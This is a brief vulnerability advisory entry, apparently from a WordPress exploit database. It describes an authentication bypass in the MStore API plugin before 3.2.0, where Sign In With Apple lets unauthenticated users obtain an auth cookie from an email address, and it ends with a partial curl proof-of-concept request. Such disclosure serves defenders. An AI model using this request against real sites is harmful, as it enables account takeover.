MStore API < 3.2.0 - Authentication Bypass With Sign In With Apple

ID WPEX-ID:BF5DDC43-974D-41FA-8276-C1A27D3CC882
Type wpexploit
Reporter Vincent Datrier
Modified 2021-02-18T06:00:55


The plugin had an authentication bypass with Sign In With Apple allowing unauthenticated users to recover an authentication cookie with only an email address.

                                            The plugin must have a valid purchase code for the request to work

curl -X GET --header 'Content-Type: application/json' --header 'Accept: application/json' -d '{ "email": "" }'